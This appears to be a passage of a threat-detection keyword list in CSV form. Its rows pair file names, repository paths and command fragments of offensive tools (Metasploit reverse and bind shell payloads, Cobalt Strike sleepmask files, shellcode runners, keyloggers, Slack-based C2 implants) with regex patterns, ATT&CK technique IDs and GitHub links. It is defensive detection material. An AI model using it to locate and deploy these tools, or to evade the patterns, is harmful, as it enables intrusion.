Runner.csproj*",".{0,1000}Simple\sShellcode\sRunner\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Simple Shellcode Runner.ps1*",".{0,1000}Simple\sShellcode\sRunner\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - 
TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Simple Shellcode Runner.vba*",".{0,1000}Simple\sShellcode\sRunner\.vba.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*simple_dropper.ninja*",".{0,1000}simple_dropper\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*simplekeylogger.*",".{0,1000}simplekeylogger\..{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*SimpleNtSyscallFuzzer.v11.suo*",".{0,1000}SimpleNtSyscallFuzzer\.v11\.suo.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*SimpleNTSyscallFuzzer-main\*",".{0,1000}SimpleNTSyscallFuzzer\-main\\.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel 
syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*SimplyEmail.py*",".{0,1000}SimplyEmail\.py.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built around the concept that tools should do something. and do that something well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplyEmail-master*",".{0,1000}SimplyEmail\-master.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built around the concept that tools should do something. and do that something well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplySecurity/SimplyEmail*",".{0,1000}SimplySecurity\/SimplyEmail.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built around the concept that tools should do something. 
and do that something well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimShell - Simorgh Security MGZ*",".{0,1000}SimShell\s\-\sSimorgh\sSecurity\sMGZ.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*single_reverse_tcp_shell.s*",".{0,1000}single_reverse_tcp_shell\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*single_shell_bind_tcp.asm*",".{0,1000}single_shell_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*single_shell_reverse_tcp.asm*",".{0,1000}single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*single_target_exploit.rb*",".{0,1000}single_target_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sipdump2john.py*",".{0,1000}sipdump2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*sipvicious_svcrack* -u100",".{0,1000}sipvicious_svcrack.{0,1000}\s\-u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sitadel http://*",".{0,1000}sitadel\shttp\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*sitadel https://*",".{0,1000}sitadel\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation 
tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*sitadel.py *",".{0,1000}sitadel\.py\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*Sitadel-master.zip*",".{0,1000}Sitadel\-master\.zip.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*site-packages/wfuzz*",".{0,1000}site\-packages\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*-Situational-Awareness-BOF*",".{0,1000}\-Situational\-Awareness\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*skaffold run -m nemesis *",".{0,1000}skaffold\srun\s\-m\snemesis\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*skahwah*wordsmith*",".{0,1000}skahwah.{0,1000}wordsmith.{0,1000}","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarily based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","2","160","22","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z" "*skelsec/evilrdp*",".{0,1000}skelsec\/evilrdp.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" 
"*skelsec/jackdaw*",".{0,1000}skelsec\/jackdaw.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1595 - T1590 - T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*skelsec/pysnaffler*",".{0,1000}skelsec\/pysnaffler.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*SkipPasswordAgeCheck*",".{0,1000}SkipPasswordAgeCheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SkipPortScan*",".{0,1000}SkipPortScan.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*skymem-get-mails *",".{0,1000}skymem\-get\-mails\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - 
T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*SkyperTHC/bpf-keylogger*",".{0,1000}SkyperTHC\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*SLACKAES256Handler.*",".{0,1000}SLACKAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*slackor.db*",".{0,1000}slackor\.db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Slackor\impacket*",".{0,1000}Slackor\\impacket.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Sleep for * ms* redirect to KrakenMask !*",".{0,1000}Sleep\sfor\s.{0,1000}\sms.{0,1000}\sredirect\sto\sKrakenMask\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*sleep_python_bridge.sleepy*",".{0,1000}sleep_python_bridge\.sleepy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is a 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleep_python_bridge.striker*",".{0,1000}sleep_python_bridge\.striker.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is a 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask.x64.o*",".{0,1000}sleepmask\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is a 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask.x86.o*",".{0,1000}sleepmask\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is a 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x64.o*",".{0,1000}sleepmask_pivot\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x86.o*",".{0,1000}sleepmask_pivot\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*slemire/WSPCoerce*",".{0,1000}slemire\/WSPCoerce.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*SlinkyCat.ps1*",".{0,1000}SlinkyCat\.ps1.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" 
